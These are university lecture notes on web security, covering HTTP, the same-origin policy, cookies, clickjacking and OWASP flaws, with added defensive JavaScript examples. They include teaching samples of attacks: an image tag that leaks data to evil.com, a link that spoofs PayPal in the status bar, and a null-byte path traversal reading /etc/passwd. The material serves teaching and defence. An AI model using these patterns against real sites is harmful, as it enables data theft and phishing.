07 Week8 10 Web Security A

This document summarizes a lecture on web security. It discusses reported web vulnerabilities, common web application vulnerabilities like cross-site scripting and SQL injection. It also covers the browser security model, authentication and session management on the web. The goals of web security are to safely browse the web without stolen information or compromised sessions between sites, and to secure web applications similarly to standalone applications. HTTPS provides encryption for browser-server traffic but does not prevent all client-side attacks.

Lecture 8-10 – Web Security

Dr. Cong Wang


CS Department
City University of Hong Kong
Slides partially adapted from lecture notes by M. Goodrich & R. Tamassia,
W. Stallings & L. Brown, Dan Boneh, and Dawn Song.
CS4293 Topics on Cybersecurity 1
Reported Web Vulnerabilities "In the Wild"

Data from aggregator and validator of NVD-reported vulnerabilities


Web application vulnerabilities


Web programming poll
• Familiar with basic html?
• Developed a web application using:
– Apache? PHP? Ruby?
– SQL?
– JavaScript? CSS?
– Ajax? JSON?

• Resource: http://www.w3schools.com/


Content on Web security
• Browser security model
– The browser as an OS and execution platform
– Basic http: headers, cookies
– Browser UI and security indicators
• Authentication and session management
– How users authenticate to web sites
– Browser-server mechanisms for managing state
• Web application security
– Application pitfalls and defenses
• HTTPS: goals and pitfalls
– Network issues and browser protocol handling

Web security could fill an entire course; we will briefly cover selected topics.


INTRODUCTION

URLs
• Global identifiers of network-retrievable documents

• Example:
http://stanford.edu:81/class?name=cs155#homework

– Protocol: http
– Hostname: stanford.edu
– Port: 81
– Path: /class
– Query: name=cs155
– Fragment: homework (kept by the browser, not sent to the server)

• Special characters are encoded as hex:
– %0A = newline
– %20 = space; in form-encoded query strings + also means space, so a literal plus must be sent as %2B (special exception)
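The URL anatomy and the two encoding rules above, as an added example that is not part of the lecture slides. It uses Node's built-in WHATWG URL class; the sample URLs are the slide's own and the function names are assumptions made for this example.

```javascript
// Added example, not from the lecture slides: split a URL into the
// components named above and show how percent-encoding differs between
// the path and a form-encoded query string. Uses Node's built-in URL class.
function urlComponents(raw) {
  const u = new URL(raw);
  return {
    protocol: u.protocol.replace(/:$/, ''), // "http"
    hostname: u.hostname,                   // "stanford.edu"
    port: u.port,                           // "81" (empty for the scheme's default port)
    path: u.pathname,                       // "/class"
    query: u.search.replace(/^\?/, ''),     // "name=cs155"
    fragment: u.hash.replace(/^#/, ''),     // "homework" (never sent to the server)
  };
}

// Percent-decode a path segment: %0A -> newline, %20 -> space. A literal
// "+" stays "+": the plus-as-space rule does not apply to paths.
function decodePath(segment) {
  return decodeURIComponent(segment);
}

// Decode one application/x-www-form-urlencoded query value, where "+"
// means space and an actual plus sign arrives as %2B (the special exception).
function decodeFormValue(value) {
  return decodeURIComponent(value.replace(/\+/g, ' '));
}

// Encode a value for a form-encoded query so that it survives the round trip.
function encodeFormValue(value) {
  return encodeURIComponent(value).replace(/%20/g, '+');
}
```

The port field is empty when the URL uses the scheme's default port, which matters for origin comparisons later in the lecture: a browser treats `http://host` and `http://host:80` as the same origin.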

HTTP Request
Method, file and HTTP version on the request line, then headers:

GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

Blank line, then data (none for a GET).

GET: no side effect. POST: possible side effect.

HTTP etc. – a quick reminder
Web browser (IE, Firefox…) talking to a web server (Apache, IIS…):

1. Browser: GET /index.html HTTP/1.1
   Server: HTTP/1.1 200 OK

2. Browser: POST /login.php HTTP/1.1
   Referer: index.html
   […]
   username=abc&password=def
   Server executes login.php (PHP) and replies:
   HTTP/1.1 200 OK
   Set-Cookie: SessionId=87325

3. Browser (JavaScript executing in the page): GET /list.php?id=3 HTTP/1.1
   Cookie: SessionId=87325
   Server: HTTP/1.1 200 OK

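The request layout and the GET/POST side-effect rule from the two slides above, as an added example that is not part of the lecture. The parser and the sample login request are constructed for this example (the field values are taken from the slides).

```javascript
// Added example, not from the lecture slides: parse a raw HTTP/1.1 request
// laid out as on the slides (request line, headers, blank line, optional
// body) into the fields a server-side check cares about. The request
// below is constructed for the example.
function parseHttpRequest(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const head = sep >= 0 ? raw.slice(0, sep) : raw;
  const body = sep >= 0 ? raw.slice(sep + 4) : '';
  const lines = head.split('\r\n');
  const [method, target, version] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i < 0) continue;                       // tolerate a malformed header line
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, version, headers, body };
}

// Decode an application/x-www-form-urlencoded body such as the login POST.
function parseForm(body) {
  const out = {};
  for (const [k, v] of new URLSearchParams(body)) out[k] = v;
  return out;
}

// The slide's rule: GET must have no side effect. A server that changes
// state on GET is what lets a hostile page trigger the change with a bare
// <img src=...> (see the image-tag and CSRF slides).
function mayHaveSideEffect(req) {
  return req.method !== 'GET' && req.method !== 'HEAD';
}

// Constructed sample: the login request from the exchange above.
const SAMPLE_LOGIN =
  'POST /login.php HTTP/1.1\r\n' +
  'Host: www.example.com\r\n' +
  'Referer: http://www.example.com/index.html\r\n' +
  'Content-Type: application/x-www-form-urlencoded\r\n' +
  '\r\n' +
  'username=abc&password=def';
```

Header names are lower-cased because HTTP header names are case-insensitive; a check that looks for `Host` but receives `host` would otherwise silently fail.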


HTTP Response
HTTP version, status code and reason phrase on the status line, then headers:

HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …   (cookies: see below)
Content-Length: 2543

Data:
<HTML> Some data... blah, blah, blah </HTML>

Rendering and events
• Basic execution model
– Each browser window or frame
• Loads content
• Renders
– Processes HTML and scripts to display page
– May involve images, subframes, etc.
• Responds to events
• Events can be
– User actions: OnClick, OnMouseover
– Rendering: OnLoad, OnBeforeUnload
– Timing: setTimeout(), clearTimeout()
Document Object Model (DOM)
• Also Browser Object Model (BOM)
– window, document, frames[], history, location, navigator (type and version of browser)

Pages can embed content from many sources
• Frames: <iframe src="//site.com/frame.html"></iframe>

• Scripts: <script src="//site.com/script.js"></script>

• CSS:
<link rel="stylesheet" type="text/css" href="//site.com/theme.css" />

• Objects (Flash): [using the swfobject.js script]

<script>
var so = new SWFObject('//site.com/flash.swf', …);
so.addParam('allowscriptaccess', 'always');
so.write('flashdiv');
</script>

HTML Image Tags
<html>
<p> … </p>
<img src="http://example.com/sunset.gif" height="50" width="100">
</html>

Displays the picture (image omitted here).

Security issues?

Image tag security issues
• Communicate with other sites
– <img src="http://evil.com/pass-local-information.jpg?extra_information">
• Hide resulting image
– <img src=" … " height="1" width="1">
• Spoof other sites
– Add logos that fool a user

Important Point: A web page can send information to any site

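The three image-tag tricks above (third-party fetch, data in the query string, hidden 1x1 pixel) turned into a check, as an added example that is not part of the lecture. The HTML scanner, the page URL and the host names are constructed for this example; it runs over page source offline.

```javascript
// Added example, not from the lecture slides: scan page HTML for <img>
// tags that contact another origin, carry data in their query string, or
// are hidden as 1x1 pixels, the three tricks listed above. The HTML and
// the host names are constructed for the example.
function imageTags(html) {
  const tags = [];
  const re = /<img\b[^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const tag = m[0];
    const attr = (name) => {
      const a = new RegExp('\\b' + name + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i').exec(tag);
      return a ? a[1] : null;
    };
    tags.push({ src: attr('src'), width: attr('width'), height: attr('height') });
  }
  return tags;
}

function suspiciousImages(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  for (const t of imageTags(html)) {
    if (!t.src) continue;
    let u;
    try { u = new URL(t.src, pageUrl); } catch (e) { continue; } // relative src resolves against the page
    const reasons = [];
    if (u.origin !== pageOrigin) reasons.push('third-party origin ' + u.origin);
    if (u.search.length > 1) reasons.push('query string can carry data');
    if (t.width === '1' && t.height === '1') reasons.push('hidden 1x1 pixel');
    if (reasons.length > 0) findings.push({ src: u.href, reasons });
  }
  return findings;
}

// Constructed page: one honest picture, one relative logo, one beacon.
const SAMPLE_HTML = `
<html><p>Sunset</p>
<img src="http://example.com/sunset.gif" height="50" width="100">
<img src="/logo.png" width="120" height="40">
<img src="http://evil.com/pass-local-information.jpg?extra_information" height="1" width="1">
</html>`;
```

A real page legitimately loads images from CDNs, so a third-party origin alone is not evidence of leakage; it is the combination with per-user data in the query string and a hidden size that marks a beacon.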
WEB SECURITY GOALS AND THREAT MODEL



Goals of web security
• Safely browse the web
– Users should be able to visit a variety of web sites,
without incurring harm:
• No stolen information (without user’s permission)
• Site A cannot compromise session at Site B
• Secure web applications
– Applications delivered over the web should have the
same security properties we require for stand-alone
applications

• Other ideas?



An Example

Operating system security: the system (Alice's machine) faces an OS attacker, who may control malicious files and applications on it.

Network security: the system faces a network attacker, who intercepts and controls network communication.

Web security: the system faces a web attacker, who sets up a malicious site visited by the victim, but has no control of the network.


Web Threat Models
• Web attacker
– Control attacker.com
– Can obtain SSL/TLS certificate for attacker.com
– User visits attacker.com
• Or: runs attacker’s Facebook app
• Network attacker
– Passive: Wireless eavesdropper
– Active: Evil router, DNS poisoning
• OS/Malware attacker
– Attacker escapes browser isolation mechanisms
and runs separately under control of the OS

Web Security ‘History’
• The web is an example of “bolt-on security”
• Originally, the web was invented to allow physicists to
share their research papers
– Only textual web pages + links to other pages;
– No security model
• Then we added embedded images
– Crucial decision: a page can embed images loaded from
another web server
• Then, audio/video, Javascript, dynamic HTML, AJAX,
CSS, plug-ins, …
• Today, a web site is a distributed application



Goals of web security (Revisited)
• Safely browse the web
– Users should be able to visit a variety of web sites, without incurring harm:
• No stolen information (without user’s permission)
• Site A cannot compromise session at Site B
• Secure web applications
– Applications delivered over the web should have the same security properties
we require for stand-alone applications
– https: http over SSL/TLS (Secure Socket Layer / Transport Layer Security)
• provides encryption for the browser-server traffic
• prevents eavesdropping and man-in-the-middle attacks (if certificate verification is done correctly)
• helps users ensure the authenticity of the server
• does not prevent attacks on the client side (cross-site scripting) or the server side (SQL injection)
– Basic http authentication:
• weak, limited functionality
• use only if really needed, and only over https

• Is that all?



Focus on Web applications – why?
Web applications are:
• often much more useful than desktop software => popular
• often publicly available
• easy target for attackers
– finding vulnerable sites, automating and scaling attacks

• easy to develop
• not so easy to develop well and securely
• often vulnerable, thus making the server, the database, the internal network, data etc. insecure



Threats
• Web defacement
=> loss of reputation (clients, shareholders)
=> fear, uncertainty and doubt
• information disclosure (lost data confidentiality)
e.g. business secrets, financial information, client database, medical data, government documents
• data loss (or lost data integrity)
• unauthorized access
=> functionality of the application abused
• denial of service
=> loss of availability or functionality (and revenue)
• "foot in the door" (attacker inside the firewall)



OWASP Top 10
• Open Web Application Security Project (the A2/A4/A7 numbering below follows the 2013 edition of the list)



A2: Broken authn & session mgmt
• Understand session hijacking techniques, e.g.:
– session fixation (attacker sets victim’s session id)
– stealing session id: eavesdropping (if not https), XSS
• Trust the solution offered by the platform / language
– and follow its recommendations (for code, configuration etc.)
• Additionally:
– generate new session ID on login (do not reuse old ones)
– use cookies for storing session id
– set session timeout and provide logout possibility
– consider enabling “same IP” policy (not always possible)
– check referer (previous URL), user agent (browser version)
– require https (at least for the login / password transfer)



A4: Insecure Direct Object Reference
• Attacker manipulates the URL or form values to get unauthorized access
– to objects (data in a database, objects in memory etc.):
http://shop.com/cart?id=413246 (your cart)
http://shop.com/cart?id=123456 (someone else's cart?)
– to files:
http://s.ch/?page=home -> home.php
http://s.ch/?page=/etc/passwd%00 -> /etc/passwd
(the C string ends at %00, so ".php" is not added)
• Solution:
– avoid exposing IDs, keys, filenames to users if possible
– validate input, accept only correct values
– verify authorization to all accessed objects (files, data etc.)



A7: Missing Function Level Access Control
• "Hidden" URLs that don't require further authorization
– to actions:
http://site.com/admin/adduser?name=x&pwd=x
(even if http://site.com/admin/ requires authorization)
– to files:
http://site.com/internal/salaries.xls
http://me.com/No/One/Will/Guess/82534/me.jpg

• Problem: missing authorization

• Solution
– add the missing authorization checks
– don't rely on security by obscurity – it will not work!
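The A4 and A7 slides above side by side with their fixes, as an added example that is not part of the lecture. The handlers, the cart and route tables, the role names and the page allowlist are all constructed for this example; the URLs and ids are the slides' own.

```javascript
// Added example, not from the lecture slides: hypothetical in-memory
// handlers showing the A4 and A7 problems above beside their fixes. Carts,
// pages, routes and roles are constructed data.
const carts = new Map([
  [413246, { owner: 'alice', items: ['book'] }],
  [123456, { owner: 'bob', items: ['phone'] }],
]);

// A4, data objects: fetch the cart, then verify the caller owns it.
// Returning null for both "missing" and "not yours" avoids confirming
// which ids exist.
function getCart(user, id) {
  const cart = carts.get(Number(id));
  if (!cart || cart.owner !== user) return null;
  return cart;
}

// A4, files, the vulnerable pattern: "?page=" is decoded and ".php" is
// appended. A NUL byte (%00) ends the string for C-level file APIs, so the
// suffix is never seen and "/etc/passwd" is opened. (Modelled here by
// cutting the name at the NUL.)
function resolvePageNaive(param) {
  const decoded = decodeURIComponent(param);
  const nul = decoded.indexOf('\0');
  return nul >= 0 ? decoded.slice(0, nul) : decoded + '.php';
}

// The fix: map the parameter through an allowlist; anything else is rejected.
const PAGES = new Set(['home', 'about', 'contact']);
function resolvePageSafe(param) {
  let decoded;
  try { decoded = decodeURIComponent(param); } catch (e) { return null; }
  if (!/^[a-z]+$/.test(decoded) || !PAGES.has(decoded)) return null;
  return decoded + '.php';
}

// A7: every URL declares who may call it; anything not listed is denied,
// so a "hidden" URL gets no access just for being unguessable.
const ROUTES = {
  'GET /cart': ['user', 'finance', 'admin'],
  'GET /admin/': ['admin'],
  'GET /admin/adduser': ['admin'],          // checked itself, not only /admin/
  'GET /internal/salaries.xls': ['finance', 'admin'],
};

function authorize(session, method, urlPath) {
  const allowed = ROUTES[method + ' ' + urlPath];
  if (!allowed) return false;               // deny by default
  if (!session || !session.role) return false;
  return allowed.includes(session.role);
}
```

Both fixes share one shape: the decision is made per object and per function, from data the server controls (ownership, an allowlist, a route table), never from the fact that the client happened to know a URL.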
ISOLATION

Running Remote Code is Risky
• Integrity
– Compromise your machine
– Install malware rootkit
– Transact on your accounts

• Confidentiality
– Read your information
– Steal passwords
– Read your email

Isolation is indispensable = a must

(Lecture note) Twenty years ago Linux had no such mechanism; today applications in the OS are isolated too. The browser must determine what each web app can and cannot access: isolation is a sandbox.

Frame and iFrame
• Window may contain frames from different
sources
– Frame: rigid division as part of frameset
– iFrame: floating inline frame
• iFrame example
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>

• Why use frames?


– Delegate screen area to content from another source
– Browser provides isolation based on frames
– Parent may work even if frame is broken



Browser Sandbox
• Goal
– Run remote web applications safely
– Limited access to OS, network, and browser data

• Approach
– Isolate sites in different security contexts
– Browser manages resources, like an OS

Same Origin Policy
(Lecture note) Scripts imported into a page run with that page's origin; the policy isolates content from different origins within the browser.



Browser security mechanism
• Each frame of a page has an origin
– Origin = protocol://host:port
• Frame can access its own origin
– Network access, read/write DOM, storage (cookies)
• Frame cannot access data associated with a different origin



Origin of Browser Primitives
Loading an external script: it runs with the origin of the page that includes it, not the origin it was fetched from. Such a script can therefore hijack the page, since it has the page's full permissions. Example (VeriSign seal):

<script src=https://seal.verisign.com/getseal?host_name=a.com></script>

Same Origin Policy: to isolate content retrieved by different parties

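The origin tuple and the script-versus-frame rule from the three slides above, as an added example that is not part of the lecture. The host names are constructed; the VeriSign seal URL is the slide's.

```javascript
// Added example, not from the lecture slides: compute the origin tuple
// the browser uses and compare two URLs the way the same-origin policy
// does. Default ports are filled in, so http://a.com and http://a.com:80
// are the same origin, while a subdomain, another port or another scheme
// is not. Host names are constructed.
function originOf(raw) {
  const u = new URL(raw);
  const defaults = { 'http:': '80', 'https:': '443' };
  const port = u.port || defaults[u.protocol] || '';
  return u.protocol + '//' + u.hostname + ':' + port;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Which origin does embedded content get? A <script> runs with the origin
// of the page that includes it, wherever it was fetched from (the VeriSign
// seal case above); an <iframe> keeps the origin of its own URL.
function effectiveOrigin(pageUrl, tag, src) {
  const resolved = new URL(src, pageUrl).href;   // handles "//host/x" and relative paths
  return tag === 'iframe' ? originOf(resolved) : originOf(pageUrl);
}
```

Note that the path is not part of the origin: two pages on the same site can read each other's DOM, which is why a single cross-site scripting bug anywhere on a host exposes every page of that host.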


When is it safe to type my password?

SECURITY USER INTERFACE

Safe to type your password? (a sequence of browser screenshots, omitted here, some marked "???")

Mixed Content: HTTP and HTTPS
• Problem
– Page loads over HTTPS, but has HTTP content
– Network attacker can control page
• IE: displays mixed-content dialog to user
– Flash files over HTTP loaded with no warning (!)
– Note: Flash can script the embedding page
• Firefox: red slash over lock icon (no dialog)
– Flash files over HTTP do not trigger the slash
• Safari: does not detect mixed content
Still current?

Mixed Content: HTTP and HTTPS
(screenshot of the "silly dialogs" omitted)

Mixed content and network attacks
• banks: after login all content over HTTPS
– Developer error: somewhere on the bank site write
<script src=http://www.site.com/script.js> </script>
– Active network attacker can now hijack any session

• Better way to include content:
<script src=//www.site.com/script.js> </script>
– served over the same protocol as the embedding page

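The developer error and the scheme-relative fix above as a check, as an added example that is not part of the lecture. The bank page URL, the resource list and the active/passive classification are constructed for this example; the script URLs are the slide's.

```javascript
// Added example, not from the lecture slides: given a page URL and the
// resource references written in its HTML, resolve each one and report
// anything fetched over plain HTTP into an HTTPS page. Scheme-relative
// "//host/x" inherits the page's scheme, which is why the slide prefers
// it. Active content (scripts, frames, plug-ins, stylesheets) is what lets
// a network attacker take over the page. Host names are constructed.
const ACTIVE_TAGS = new Set(['script', 'iframe', 'object', 'embed', 'link']);

function mixedContent(pageUrl, resources) {
  const page = new URL(pageUrl);
  const findings = [];
  for (const r of resources) {
    const u = new URL(r.src, page);               // resolves "//host" and relative paths
    if (page.protocol === 'https:' && u.protocol === 'http:') {
      findings.push({
        tag: r.tag,
        src: u.href,
        severity: ACTIVE_TAGS.has(r.tag) ? 'active' : 'passive',
      });
    }
  }
  return findings;
}

// Constructed bank page after login: one developer error, one correct
// scheme-relative include, one insecure image, one local image.
const BANK_PAGE = 'https://bank.example/account';
const BANK_RESOURCES = [
  { tag: 'script', src: 'http://www.site.com/script.js' },
  { tag: 'script', src: '//www.site.com/script.js' },
  { tag: 'img', src: 'http://cdn.site.com/logo.png' },
  { tag: 'img', src: '/images/local.png' },
];
```

The same page served over plain HTTP produces no findings: mixed content is only a property of HTTPS pages, which is the point of the bank example.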


Lock Icon 2.0
• Extended validation (EV) certs
• Prominent security indicator for EV certificates
(Lecture note: a URL that has not inherited the full origin from the browser is shown yellowed.)
• note: EV site loading content from non-EV site does not trigger mixed content warning

Finally: the status bar
• Trivially spoofable (easy to fool you):
<a href="http://www.paypal.com/"
onclick="this.href = 'http://www.evil.com/';">
PayPal</a>
Clickjacking
Example: Delete Twitter account
Clickjacking Aspects
• Compromise visual integrity of target
– Hide target
– Partial overlay
• Compromise visual integrity of pointer
– Manipulate pointer feedback
Example: User Webcam
– Fake link leads to a request for access to the webcam
ClickJacking Defence
• Require confirmation for actions (annoys users)
• Frame-busting: Web site ensures that its "vulnerable" pages can't be included as a frame inside another browser frame
– So user can't be looking at it with something invisible overlaid on top …
– … nor have the site invisible above something else
– Conceptually implemented with JavaScript like:
if (top.location != self.location)
    top.location = self.location;
(Note: actually quite tricky to get this right!)
COOKIES: CLIENT STATE

Cookies
• Used to store state on user's machine

Server → Browser, in the HTTP response header:
Set-Cookie: NAME=VALUE ;
            domain = (who can read) ;
            expires = (when expires; if expires is NULL the cookie lasts this session only) ;
            secure = (only over SSL)

Browser → Server, on every later request to that domain:
Cookie: NAME=VALUE



HTTP is stateless protocol; cookies add state
Cookie authentication
Browser, Web Server and Auth server:

1. Browser → Web server: POST login.cgi with username & password
2. Web server → Auth server: validate user; on success the auth server stores val
3. Web server → Browser: Set-Cookie: auth=val
4. Browser → Web server: GET restricted.html with Cookie: auth=val
5. Web server → Auth server: check val; answer YES/NO
6. If YES, web server returns restricted.html



Cookie Security Policy
• Uses:
– User authentication
– Personalization
– User tracking: e.g. Doubleclick (3rd party cookies)

• Browser will store:
– At most 20 cookies/site, 3 KB / cookie (historical limits; current browsers allow more)

• Cookie scope is the tuple <domain, path> (not the script origin: no scheme or port)
– Can set cookies valid across a domain suffix
Secure Cookies
Server → Browser, HTTP header:
Set-Cookie: NAME=VALUE; Secure

• Provides confidentiality against a network attacker
• Browser will only send the cookie back over HTTPS

• … but no integrity
• A response over plain HTTP could still set or overwrite a Secure cookie (current browsers refuse Secure cookies set over HTTP, but the original design allowed it)
=> network attacker can rewrite secure cookies
=> can log user into attacker's account
httpOnly Cookies
Server → Browser, HTTP header:
Set-Cookie: NAME=VALUE; HttpOnly

• Cookie sent over HTTP(S), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs

Web Application Security


Three top web site vulnerabilities
• SQL Injection
– Browser sends malicious input to server
– Bad input checking leads to malicious SQL query
(uses SQL to change the meaning of a database command)

• CSRF – Cross-site request forgery
– Bad web site sends request to good web site, using credentials of an innocent victim who "visits" the bad site
(leverages the user's session at the victim server)

• XSS – Cross-site scripting
– Bad web site sends innocent victim a script that steals information from an honest web site
(injects malicious script into a trusted context)